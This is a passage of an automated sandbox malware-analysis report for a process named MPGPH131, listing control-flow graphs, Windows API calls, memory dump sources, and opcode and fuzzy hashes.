                                      control_flow_graph 491 b1acb0-b1accf 492 b1acd5-b1ace8 491->492 493 b1adfc call ab2040 491->493 494 b1ad13-b1ad1b 492->494 495 b1acea 492->495 500 b1ae01 call ab1fa0 493->500 497 b1ad24-b1ad34 494->497 498 b1ad1d-b1ad22 494->498 499 b1acec-b1acf1 495->499 501 b1ad43-b1ad45 497->501 502 b1ad36-b1ad3b 497->502 498->499 503 b1acf4-b1acf5 call b8bfb1 499->503 509 b1ae06-b1ae0b call b914d0 500->509 506 b1ad57 501->506 507 b1ad47-b1ad55 call b8bfb1 501->507 502->500 505 b1ad41 502->505 513 b1acfa-b1acff 503->513 505->503 512 b1ad59-b1ad7c 506->512 507->512 517 b1add3-b1adf9 call b8dc90 call b8e210 512->517 518 b1ad7e-b1ada8 call b8dc90 call b8e210 512->518 513->509 514 b1ad05-b1ad11 513->514 514->512 527 b1adaa-b1adb8 518->527 528 b1adbc-b1add0 call b8c232 518->528 527->509 529 b1adba 527->529 529->528
                                      APIs
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00B1AE01
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task
                                      • String ID:
                                      • API String ID: 118556049-0
                                      • Opcode ID: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
                                      • Instruction ID: 39eb036681f86293bb6c5fd4e4a559f652a5300d4aef237bdd20c7516cc80769
                                      • Opcode Fuzzy Hash: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
                                      • Instruction Fuzzy Hash: 1E41D372A011049BCB15EF68DD806AEBBE5EF45311B6402B9F814EB251D730EE51DBD2

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 532 ba1832-ba1846 call ba7400 535 ba1848-ba184a 532->535 536 ba184c-ba1854 532->536 537 ba189a-ba18ba call ba736f 535->537 538 ba185f-ba1862 536->538 539 ba1856-ba185d 536->539 549 ba18cc 537->549 550 ba18bc-ba18ca call b99f28 537->550 542 ba1880-ba1890 call ba7400 FindCloseChangeNotification 538->542 543 ba1864-ba1868 538->543 539->538 541 ba186a-ba187e call ba7400 * 2 539->541 541->535 541->542 542->535 553 ba1892-ba1898 542->553 543->541 543->542 551 ba18ce-ba18d1 549->551 550->551 553->537
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00BA1719,00000000,CF830579,00BDFCB8,0000000C,00BA17D5,00B958DD,?), ref: 00BA1888
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 47fdf6f4b6689c07a701d83b27040ffed2d9a1dd863b3459cea21e60abba066f
                                      • Instruction ID: 5c8f3e957d56eecdc0dc14e697ea31cb54f8385fba86b973c0f14788c0937cc2
                                      • Opcode Fuzzy Hash: 47fdf6f4b6689c07a701d83b27040ffed2d9a1dd863b3459cea21e60abba066f
                                      • Instruction Fuzzy Hash: 6D116B3365C12029D765227C6C41B7E2BC9CF83778F3909D9F8159B1D2EF6C9C424145

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 558 b9ad7c-b9ad94 call ba7400 561 b9adaa-b9adc0 SetFilePointerEx 558->561 562 b9ad96-b9ad9d 558->562 564 b9adc2-b9add3 call b99f28 561->564 565 b9add5-b9addf 561->565 563 b9ada4-b9ada8 562->563 566 b9adfb-b9adfe 563->566 564->563 565->563 567 b9ade1-b9adf6 565->567 567->566
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(00000000,00000000,00BDF970,00B8B2D2,00000002,00B8B2D2,00000000,?,?,?,00B9AE86,00000000,?,00B8B2D2,00000002,00BDF970), ref: 00B9ADB8
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 4c00860e8b98588e0f13013f2fd76d8469bddd8269656a84424b1e2a386c8dec
                                      • Instruction ID: e515bfda042a4174f7b5d6d3bde6b4babb439f86940143180807e4bb05d2d113
                                      • Opcode Fuzzy Hash: 4c00860e8b98588e0f13013f2fd76d8469bddd8269656a84424b1e2a386c8dec
                                      • Instruction Fuzzy Hash: A5012632624159AFCF058F59CC45C9E3BA9DF81330F3502A8F8019B2A0EA71ED4187D0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 571 b8bfb1-b8bfb4 572 b8bfc3-b8bfc6 call b9ac4c 571->572 574 b8bfcb-b8bfce 572->574 575 b8bfd0-b8bfd1 574->575 576 b8bfb6-b8bfc1 call b9e4f8 574->576 576->572 579 b8bfd2-b8bfd6 576->579 580 b8bfdc 579->580 581 ab1fa0-ab1ff0 call ab1f80 call b8dc1b call b8d371 579->581 580->580
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00AB1FDE
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID:
                                      • API String ID: 2659868963-0
                                      • Opcode ID: d13312a40ae0aba2800e1300753dba95f17646a2421c4c07496071a155334446
                                      • Instruction ID: 085eb2663a62a95208150d570014491e8bcc18c5cf6109b73a553c9e1f129c28
                                      • Opcode Fuzzy Hash: d13312a40ae0aba2800e1300753dba95f17646a2421c4c07496071a155334446
                                      • Instruction Fuzzy Hash: D001FE3640420D77CB14FBB4EC01D99B7ECDE11360B5085B6FA149A5A1FBB0E590C7D5
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,00B8A41C,?,?,00BA2A99,00000001,00000364,?,00000006,000000FF,?,00B8D39B,?,?,?,?), ref: 00BA3155
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 574364ca675131a036ac81d17e2907d6a1bfcaaeb8f53c619f3a9c9ddc3773fb
                                      • Instruction ID: 3c0eec96febdbc4c2cf5f99440b824d33a1ec3e58f4ab83a55781115bece6f33
                                      • Opcode Fuzzy Hash: 574364ca675131a036ac81d17e2907d6a1bfcaaeb8f53c619f3a9c9ddc3773fb
                                      • Instruction Fuzzy Hash: 14F0E93160D728669B616B6A8C41B5B77C9DF43FB0F1580E1BC18BA180CB30EA4041E0
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00B8D39B,?,?,?,?,?,00AB2D8D,00B8A41C,?,?,00B8A41C), ref: 00BA3B80
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 62f86ca7a72307a1a6d146e253e7ca1c9bd58037cc3e1071884428e9ff753618
                                      • Instruction ID: f14498b95850780c8b055871d4e44cf7fdb5e6b03e24c9fa8a5a95d9e3e4cf4d
                                      • Opcode Fuzzy Hash: 62f86ca7a72307a1a6d146e253e7ca1c9bd58037cc3e1071884428e9ff753618
                                      • Instruction Fuzzy Hash: 06E0ED3150D320A6EA2036298C80B6B66CBCB87BB0F9506E4BC189A181DB60CE0081B1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5802822ff56d149ca89517ae2cce6ae367cfe2435b7c855b27bc72fd4fd7f584
                                      • Instruction ID: cdd75d9def859f9bbb70aad20eb3f3f358d54fae399e9825da3f75f5a6079c08
                                      • Opcode Fuzzy Hash: 5802822ff56d149ca89517ae2cce6ae367cfe2435b7c855b27bc72fd4fd7f584
                                      • Instruction Fuzzy Hash: 8B218FA7A8D282EED7024DE04B517F6BF69BB93634722417FF04389143FA45560B93A1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a3dedb122b122c1492a97f93fc6b4d7d78416153a6a7372ec52555f0e6a3c3b
                                      • Instruction ID: d9b46f8d37d6747ca1ed9fe09c61bbb34c9b28e39497fcbefe21501c28a8f602
                                      • Opcode Fuzzy Hash: 4a3dedb122b122c1492a97f93fc6b4d7d78416153a6a7372ec52555f0e6a3c3b
                                      • Instruction Fuzzy Hash: A8119DAB38C057FDA10259C11B149FAAA2EE7D3374331803EF80796542FA955B0B7570
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0ed757c4e03e24916d9ef42266309225285773789fc2f6aef51e3477d4b68f16
                                      • Instruction ID: 15b8e06c22aa8e79eef6d4fd4666172aa3ceb0302b812cbf2d87dd345ef3740c
                                      • Opcode Fuzzy Hash: 0ed757c4e03e24916d9ef42266309225285773789fc2f6aef51e3477d4b68f16
                                      • Instruction Fuzzy Hash: BA11D09F38C056FDA10259D11B499F6AB2EE6D3370331843EF4079A542FA945A0B7571
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 412c70bfd0103ed8ecabcf93402c6e356fcb7aaab90a94f5109159eeba2b3158
                                      • Instruction ID: 183cf3f1790cb5a65816c49eb60adf70b77d3ca3ea7c3706cafec445008dd09e
                                      • Opcode Fuzzy Hash: 412c70bfd0103ed8ecabcf93402c6e356fcb7aaab90a94f5109159eeba2b3158
                                      • Instruction Fuzzy Hash: 4601CCAB38C057FE950219C25B499FABB2EE7D2370331803EF40785502FA856B0BB5B1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f6d7fba41ce0dac47bf35a156a0917559f23d26c6829d1c3d3f64ade7d12d2cc
                                      • Instruction ID: bd21b1ad565c78c8e280d4850f0357006dc305094d55b633ffd5d1fee44cb9d7
                                      • Opcode Fuzzy Hash: f6d7fba41ce0dac47bf35a156a0917559f23d26c6829d1c3d3f64ade7d12d2cc
                                      • Instruction Fuzzy Hash: 2601C0AB388052FE95020DD15B549FABB2EE7D2334331843EF443C5502FE956A0BA6B0
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7f054e574cd395840f2374e9fccb4796b98cef43491a66cd0e75a81ad9845cdb
                                      • Instruction ID: 35ec1ed401fb923a29ee65cd94d702f6fa80b699618ee137def22547c0bc07ba
                                      • Opcode Fuzzy Hash: 7f054e574cd395840f2374e9fccb4796b98cef43491a66cd0e75a81ad9845cdb
                                      • Instruction Fuzzy Hash: 4801B1AB388152FE96024DD15B449FABF6EFBD2330371803EF44785602FA956B0BA561
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e0ace055ef26c08d6470144120180d9ea5b87672e43fae9bd7f0efa4cb0aa9d9
                                      • Instruction ID: 4af5b5707e6a0df109435ff332414419204fd63d9d1163cf88c5bf4cccd9cc2f
                                      • Opcode Fuzzy Hash: e0ace055ef26c08d6470144120180d9ea5b87672e43fae9bd7f0efa4cb0aa9d9
                                      • Instruction Fuzzy Hash: 370126AB34D1A2FEC6020DD11B866F6BF2AEB93231331403EF44785043FA491B0BA5A1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04fd4d8937f928c434c4f89279031187935e3b940886f916797c05766e8ce9cc
                                      • Instruction ID: 96ad16b355d14d3e04f5627044dfbba680d8447fb1d0c08acb28269576da7df1
                                      • Opcode Fuzzy Hash: 04fd4d8937f928c434c4f89279031187935e3b940886f916797c05766e8ce9cc
                                      • Instruction Fuzzy Hash: 04F0B4AB38C063FEC1021DD14F896B5BB1AA7A2271321402DF04755503BE49670BA5A1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ab7cb1b0f1e9559b79de2d54270f0aa213410a426e9da91d06cb0cd4b6592bf2
                                      • Instruction ID: 1c44a08fec1646e492751d3ca59580828718f18c3c14db53b7edf514b9cdbb51
                                      • Opcode Fuzzy Hash: ab7cb1b0f1e9559b79de2d54270f0aa213410a426e9da91d06cb0cd4b6592bf2
                                      • Instruction Fuzzy Hash: 13F0E29B34C0A3EE85061DD24F896FAFF6AAA92275331003EF08781113BE45670BA560
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1b12241fb87cc64a466c588c61dce8b3294077d3c7a17e6ac97dfac34ecf53d7
                                      • Instruction ID: 86b6e4f871dbe19792a7db7e12f69b9be84e72305feebbf35aa05f21203fcbed
                                      • Opcode Fuzzy Hash: 1b12241fb87cc64a466c588c61dce8b3294077d3c7a17e6ac97dfac34ecf53d7
                                      • Instruction Fuzzy Hash: 81D092AF24C062EEA4414DD22B0A676EA29A3E2231370842BF05785042BE5A670FB530
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b5d8f09ed06dc28f4eac24441af2dd0b42024b1824c1418e6269509fcc719256
                                      • Instruction ID: 88a00da5361590f2b6bce44c488c101098d78fca0936eb290dedceefe3c61ad5
                                      • Opcode Fuzzy Hash: b5d8f09ed06dc28f4eac24441af2dd0b42024b1824c1418e6269509fcc719256
                                      • Instruction Fuzzy Hash: E5F02BD360DBA46EA55294235B519FB2F2CF6933F83318557F4C7C6482EA08298F61F1
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00B1A143
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00B1A165
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00B1A185
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00B1A1AF
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00B1A21D
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B1A269
                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00B1A283
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00B1A318
                                      • std::_Facet_Register.LIBCPMT ref: 00B1A325
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
